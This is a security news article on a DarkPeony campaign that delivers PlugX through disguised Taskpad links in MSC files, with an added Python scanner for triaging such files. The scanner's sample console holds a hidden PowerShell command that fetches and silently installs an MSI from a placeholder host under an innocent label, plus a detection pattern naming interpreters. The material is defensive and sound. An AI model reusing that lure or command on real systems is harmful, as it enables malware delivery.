A threat actor known as DarkPeony has been observed abusing Microsoft Management Console (MSC) files to deliver malware in a new campaign. The operation, dubbed ‘Operation ControlPlug’ by NTT’s security team, is aimed at military and government organizations in Myanmar, the Philippines, Mongolia, and Serbia.
MSC files, or Microsoft Common Console Documents, are associated with the Microsoft Management Console and contain XML-formatted content. A lesser-known feature, the Console Taskpad, allows for the execution of arbitrary commands. Attackers exploit this feature by manipulating the appearance settings within MSC files to trick users into clicking the Taskpad link without suspicion.
The attack begins when an MSC file is opened. The file presents a window with a link; clicking it triggers a PowerShell script. That script downloads an MSI file from a remote server and executes it. The MSI contains an executable (EXE) file, a dynamic link library (DLL) file, and a data (DAT) file; after these are written to a directory, the .exe file is executed.
The .exe is a legitimate executable, but it is susceptible to DLL side-loading and loads the DLL file from the same directory. The DLL reads and decodes the DAT file, ultimately executing the PlugX malware.
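The abused feature is a Taskpad task whose visible label says one thing while its command line does another, so a defender's triage of a suspicious MSC file comes down to comparing the two. The scanner below is an added example written for this article, not code from NTT or Genians. It assumes the MMC console XML layout as I understand it (an MMC_ConsoleFile root, Taskpad/Task elements with Type="CommandLine" carrying Command and Params attributes, and a StringTable that holds the link labels); because those element names are assumptions, the scanner also does a schema-agnostic sweep of every attribute and text value for interpreter names and URLs, which still fires if the task layout differs. The sample console file is constructed for the example and points at a non-routable placeholder host.

```python
"""Triage helper for MSC (MMC console) files: flag Taskpad tasks that launch commands.

Added example, not from the NTT report. Element and attribute names
(MMC_ConsoleFile, Taskpad, Task, Command, Params, StringTable, String) are my
assumptions about the console XML format; the schema-agnostic sweep below does
not depend on them.
"""
import re
import xml.etree.ElementTree as ET

# Interpreters and installers that a Taskpad link commonly hands control to.
# Matched case-insensitively against every attribute and text value in the file.
SUSPICIOUS_TOKENS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec)(\.exe)?\b",
    re.IGNORECASE,
)
URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample: a console whose only task is labelled "Open document" but
# runs PowerShell that fetches and installs an MSI (placeholder host, not real).
SAMPLE_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <Taskpads>
    <Taskpad ID="{00000000-0000-0000-0000-000000000001}" Name="Document">
      <Tasks>
        <Task Type="CommandLine" Command="powershell.exe"
              Params="-WindowStyle Hidden -Command Start-Process msiexec.exe -ArgumentList '/i https://example.invalid/doc.msi /qn'"
              Directory="" WindowState="Minimized">
          <String Name="Name" ID="1"/>
        </Task>
      </Tasks>
    </Taskpad>
  </Taskpads>
  <StringTables>
    <StringTable>
      <Strings>
        <String ID="1" Refs="1">Open document</String>
      </Strings>
    </StringTable>
  </StringTables>
</MMC_ConsoleFile>
"""

# Constructed benign console: views only, no Taskpad at all.
BENIGN_MSC = """<?xml version="1.0"?>
<MMC_ConsoleFile ConsoleVersion="3.0" ProgramMode="UserSDI">
  <Views><View ID="1"/></Views>
</MMC_ConsoleFile>
"""


def scan_msc(xml_text: str) -> dict:
    """Return a findings dict for one console file's XML content."""
    # For genuinely untrusted input, parse with defusedxml instead of the stdlib.
    root = ET.fromstring(xml_text)
    findings = {"command_tasks": [], "tokens": set(), "urls": [], "notes": []}
    if root.tag != "MMC_ConsoleFile":  # assumed root element name
        findings["notes"].append(f"unexpected root element: {root.tag}")

    # Label lookup: only StringTable entries carry text; Task-level <String/> refs do not.
    labels = {s.get("ID"): s.text.strip() for s in root.iter("String") if s.text and s.text.strip()}

    for elem in root.iter():
        # 1. The abused feature: a Taskpad task that runs a command line.
        if elem.tag == "Task" and elem.get("Type", "").lower() == "commandline":
            cmdline = elem.find("CommandLine")  # alternative child-element layout (assumed)
            src = elem if elem.get("Command") is not None else cmdline
            name_ref = elem.find("String[@Name='Name']")
            findings["command_tasks"].append({
                "label": labels.get(name_ref.get("ID")) if name_ref is not None else None,
                "command": src.get("Command") if src is not None else None,
                "params": src.get("Params") if src is not None else None,
            })
        # 2. Schema-agnostic sweep of every value in the file.
        values = list(elem.attrib.values())
        if elem.text and elem.text.strip():
            values.append(elem.text.strip())
        for value in values:
            for m in SUSPICIOUS_TOKENS.finditer(value):
                findings["tokens"].add(m.group(0).lower())
            findings["urls"].extend(URL_PATTERN.findall(value))

    findings["tokens"] = sorted(findings["tokens"])
    findings["verdict"] = "suspicious" if findings["command_tasks"] or findings["tokens"] else "clean"
    return findings


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_MSC), ("benign", BENIGN_MSC)):
        result = scan_msc(doc)
        print(name, result["verdict"])
        for task in result["command_tasks"]:
            print(f"  link text {task['label']!r} runs {task['command']} {task['params']}")
        print("  tokens:", result["tokens"], "urls:", result["urls"])
```

In a hunt, run this over every MSC file that arrived by mail or download and treat any "command_tasks" entry as worth a look, since a console that ships with a clickable task is exactly the artefact described above; the label-versus-command pairing in the output is what makes the lure obvious to an analyst even when the link text looks harmless.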
The researchers note that websites distributing the MSI files involved in Operation ControlPlug often use Cloudflare for access control, likely to thwart analysis by researchers.
In a separate report, South Korean security firm Genians detailed another attack abusing MSC files, orchestrated by a North Korean threat actor tracked by the cybersecurity community as Kimsuky.